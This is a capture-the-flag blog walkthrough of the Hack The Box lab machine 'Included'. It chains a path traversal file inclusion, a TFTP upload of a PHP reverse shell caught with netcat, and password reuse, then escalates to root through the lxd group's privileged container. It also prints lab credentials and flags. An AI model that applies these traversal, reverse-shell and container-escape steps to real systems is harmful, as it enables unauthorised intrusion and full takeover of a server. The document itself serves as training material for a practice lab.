HTB Starting Point – Included

$./ennumeration.sh

[+] 10.10.10.55 scan started...
[-] Open ports : 80 found

Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-29 17:20 CEST
Nmap scan report for 10.10.10.55
Host is up (0.044s latency).

PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
| http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_Requested resource was http://10.10.10.55/?file=index.php
|_https-redirect: ERROR: Script execution failed (use -d to debug)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.55 seconds
[+] 10.10.10.55 scan finished...

Open ports detected:
80/tcp open  http   Apache httpd 2.4.29 ((Ubuntu))

Access to: http://10.10.10.55
Url redirection to http://10.10.10.55/?file=index.php

Use Owasp-Zap to scan this site:

This machine is vulnerable to a File Inclusion Path Traversal attack.

According to the application description:

The Path Traversal attack technique allows an attacker access to files, directories, and commands that potentially reside outside the web document root directory. An attacker may manipulate a URL in such a way that the web site will execute or reveal the contents of arbitrary files anywhere on the webserver. Any device that exposes an HTTP-based interface is potentially vulnerable to Path Traversal

Accessing to this URL:
http://10.10.10.55/?file=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd

What does %2F mean?
% = escaped character and
2F chars are hexadecimal characters
Looking in http://www.asciitable.com/ we can observe that 2F is character «/»

Then the final URL is http://10.10.10.55/?file=../../../../etc/passwd

How this path is constructed?

As we discovered before we have an apache web server. The default apache web content is in the path: /var/www/html

$cd /var/www/html/
$ls
index.html  index.nginx-debian.html

We want to access to passwd file (located in /etc/)

From the starting point, we need to jump 3 times: html/, www/ and /var (using «../») to reach root the top root’s folder (/).
Then we just need to access to /etc/passwd

passwd file is showed in the upper side oh the website

Save this information into a file we’ve obtained passwd file of the system.

Based on the passwd file there should be a tftp service.
Maybe running? (TFT uses UDP)

Let’s use nmap to check it.

sudo nmap -sU -v 10.10.10.55

Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-29 17:53 CEST
Initiating Ping Scan at 17:53
Scanning 10.10.10.55 [4 ports]
Completed Ping Scan at 17:53, 0.08s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 17:53
Completed Parallel DNS resolution of 1 host. at 17:53, 0.00s elapsed
Initiating UDP Scan at 17:53
Scanning 10.10.10.55 [1000 ports]
Completed UDP Scan at 18:11, 1087.62s elapsed (1000 total ports)
Nmap scan report for 10.10.10.55
Host is up (0.043s latency).
Not shown: 999 closed ports
PORT   STATE         SERVICE
69/udp open|filtered tftp

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 1087.82 seconds
           Raw packets sent: 1454 (42.053KB) | Rcvd: 1099 (62.333KB)

So there is a tftp service here.
We can try to connect and upload anything.

$echo 1 > test.txt 
$tftp 10.10.10.55
tftp> put test.txt

Sent 3 bytes in 0.1 seconds

Foothold

We can connect and send a file, therefore we using both findings we can get a reverse shell.
As we have PHP available we can use a PHP reverse shell.

https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php

Add your Htb IP:

tftp> put shell.php

Sent 5669 bytes in 0.6 seconds

The default TFTP root folder is /var/lib/tftpboot.

So, to use the PHP shell we need to access to http://10.10.10.55/?file=../../../../var/lib/tftpboot/shell.php

Open a netcat session to obtain the result of the shell:

$nc -lvnp 1234

listening on [any] 1234 ...

Access to the URL of the shell.
http://10.10.10.55/?file=../../../../var/lib/tftpboot/shell.php

We’ve accessed as user www-data

$ python3 -c "import pty; pty.spawn('/bin/bash')"

www-data@included:/$

Based on the usernames found in the passwd files, we can try to guess the password from any of the previous passwords found in the last machines.

mike/Sheffield19 works fine and we can switch to mike’s account.

www-data@included:/
$ su mikesu mike
Password: Sheffield19

User flag:

mike@included:~$ cat user.txt

a56ef91d70cfbf2cdb8f454c006935a1

Privilege Escalation

mike@included:~$ groups

mike lxd

mike belong to lxd group.

The LXD group is a high-privileged Linux group, which can be used to escalate to root.

First, clone the following repository and build an alpine image.

A full description of this attack can be found here: https://www.hackingarticles.in/lxd-privilege-escalation/

$git clone  https://github.com/saghul/lxd-alpine-builder.git

S'està clonant a «lxd-alpine-builder»...
remote: Enumerating objects: 27, done.
remote: Total 27 (delta 0), reused 0 (delta 0), pack-reused 27
S'estan rebent objectes: 100% (27/27), 16.00 KiB | 315.00 KiB/s, fet.
S'estan resolent les diferències: 100% (6/6), fet.

$cd lxd-alpine-builder
$ls

build-alpine  LICENSE  README.md

$sudo ./build-alpine -h

getopt: l’opció «h» necessita un argument
Usage: build-alpine [-h|--help] [-r|--repository <url>]
                   [-R|--release <release>] [-a|--arch <arch>]
                   [PKG...]

 $sudo ./build-alpine

Determining the latest release... v3.12
Using static apk from http://dl-cdn.alpinelinux.org/alpine//v3.12/main/x86_64
Downloading alpine-mirrors-3.5.10-r0.apk
tar: S'ignora la paraula clau desconeguda de la capçalera estesa «APK-TOOLS.checksum.SHA1»
Downloading alpine-keys-2.2-r0.apk
...
Downloading apk-tools-static-2.10.5-r1.apk
tar: S'ignora la paraula clau desconeguda de la capçalera estesa «APK-TOOLS.checksum.SHA1»
alpine-devel@lists.alpinelinux.org-4a6a0840.rsa.pub: OK
Verified OK
Selecting mirror http://mirrors.gigenet.com/alpinelinux/v3.12/main
fetch http://mirrors.gigenet.com/alpinelinux/v3.12/main/x86_64/APKINDEX.tar.gz
(1/19) Installing musl (1.1.24-r8)
(2/19) Installing busybox (1.31.1-r16)
Executing busybox-1.31.1-r16.post-install
(3/19) Installing alpine-baselayout (3.2.0-r6)
Executing alpine-baselayout-3.2.0-r6.pre-install
Executing alpine-baselayout-3.2.0-r6.post-install
(4/19) Installing openrc (0.42.1-r10)
Executing openrc-0.42.1-r10.post-install
(5/19) Installing alpine-conf (3.9.0-r1)
(6/19) Installing libcrypto1.1 (1.1.1g-r0)
(7/19) Installing libssl1.1 (1.1.1g-r0)
(8/19) Installing ca-certificates-bundle (20191127-r2)
(9/19) Installing libtls-standalone (2.9.1-r1)
(10/19) Installing ssl_client (1.31.1-r16)
(11/19) Installing zlib (1.2.11-r3)
(12/19) Installing apk-tools (2.10.5-r1)
(13/19) Installing busybox-suid (1.31.1-r16)
(14/19) Installing busybox-initscripts (3.2-r2)
Executing busybox-initscripts-3.2-r2.post-install
(15/19) Installing scanelf (1.2.6-r0)
(16/19) Installing musl-utils (1.1.24-r8)
(17/19) Installing libc-utils (0.7.2-r3)
(18/19) Installing alpine-keys (2.2-r0)
(19/19) Installing alpine-base (3.12.0-r0)
Executing busybox-1.31.1-r16.trigger
OK: 8 MiB in 19 packages

Upload the file to the server by using python’s SimpleHttpServer

python -m SimpleHTTPServer 8888
mike@included:/tmp$ wget 10.10.14.19:8888/alpine-v3.12-x86_64-20200530_1316.tar.gz

<14.19:8888/alpine-v3.12-x86_64-20200530_1316.tar.gz
--2020-05-30 11:22:29--  http://10.10.14.19:8888/alpine-v3.12-x86_64-20200530_1316.tar.gz
Connecting to 10.10.14.19:8888... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3110856 (3.0M) [application/gzip]
Saving to: ‘alpine-v3.12-x86_64-20200530_1316.tar.gz’

alpine-v3.12-x86_64 100%[===================>]   2.97M  2.01MB/s    in 1.5s    

2020-05-30 11:22:31 (2.01 MB/s) - ‘alpine-v3.12-x86_64-20200530_1316.tar.gz’ saved [3110856/3110856]

mike@included:/tmp$ lxc image import ./alpine-v3.12-x86_64-20200530_1316.tar.gz --alias rootimage

<v3.12-x86_64-20200530_1316.tar.gz --alias rootimage
mike@included:/tmp$ lxc init rootimage ignite -c security.privileged=true
lxc init rootimage ignite -c security.privileged=true
Creating ignite

The commands above will import the image and create a privileged container with it.

Next, the host file system is mounted to the /mnt/root folder on the container.

mike@included:/tmp$ lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true

<ydevice disk source=/ path=/mnt/root recursive=true
Device mydevice added to ignite

The command above will let us have access to the entire filesystem from within the container.

The next set of commands start the container and drop us into a shell on it.

mike@included:/tmp$ lxc start ignite

lxc start ignite
mike@included:/tmp$ lxc exec ignite /bin/sh
lxc exec ignite /bin/sh
~ #

Finally, we can navigate to /mnt/root/root/ and read root.txt along with login.sql, which reveals more credentials.

~ # id      
uid=0(root) gid=0(root)
~ # cd /mnt/root/root
/mnt/root/root # ls       
login.sql  root.txt

/mnt/root/root # cat root.txt

c693d9c7499d9f572ee375d4c14c7bcf

/mnt/root/root # cat login.sql

-- MySQL dump 10.16  Distrib 10.1.44-MariaDB, for debian-linux-gnu (x86_64)
--
-- Host: localhost    Database: Markup
-- ------------------------------------------------------
-- Server version 10.1.44-MariaDB-0ubuntu0.18.04.1

/*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */;
/*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */;
/*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */;
/*!40101 SET NAMES utf8mb4 */;
/*!40103 SET @OLD_TIME_ZONE=@@TIME_ZONE */;
/*!40103 SET TIME_ZONE='+00:00' */;
/*!40014 SET @OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0 */;
/*!40014 SET @OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0 */;
/*!40101 SET @OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='NO_AUTO_VALUE_ON_ZERO' */;
/*!40111 SET @OLD_SQL_NOTES=@@SQL_NOTES, SQL_NOTES=0 */;

--
-- Table structure for table `login`
--

DROP TABLE IF EXISTS `login`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `login` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `username` varchar(100) NOT NULL,
  `password` varchar(100) NOT NULL,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=2 DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `login`
--

LOCK TABLES `login` WRITE;
/*!40000 ALTER TABLE `login` DISABLE KEYS */;
INSERT INTO `login` VALUES (1,'Daniel','>SNDv*2wzLWf');
/*!40000 ALTER TABLE `login` ENABLE KEYS */;
UNLOCK TABLES;
/*!40103 SET TIME_ZONE=@OLD_TIME_ZONE */;

/*!40101 SET SQL_MODE=@OLD_SQL_MODE */;
/*!40014 SET FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS */;
/*!40014 SET UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS */;
/*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT */;
/*!40101 SET CHARACTER_SET_RESULTS=@OLD_CHARACTER_SET_RESULTS */;
/*!40101 SET COLLATION_CONNECTION=@OLD_COLLATION_CONNECTION */;
/*!40111 SET SQL_NOTES=@OLD_SQL_NOTES */;

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *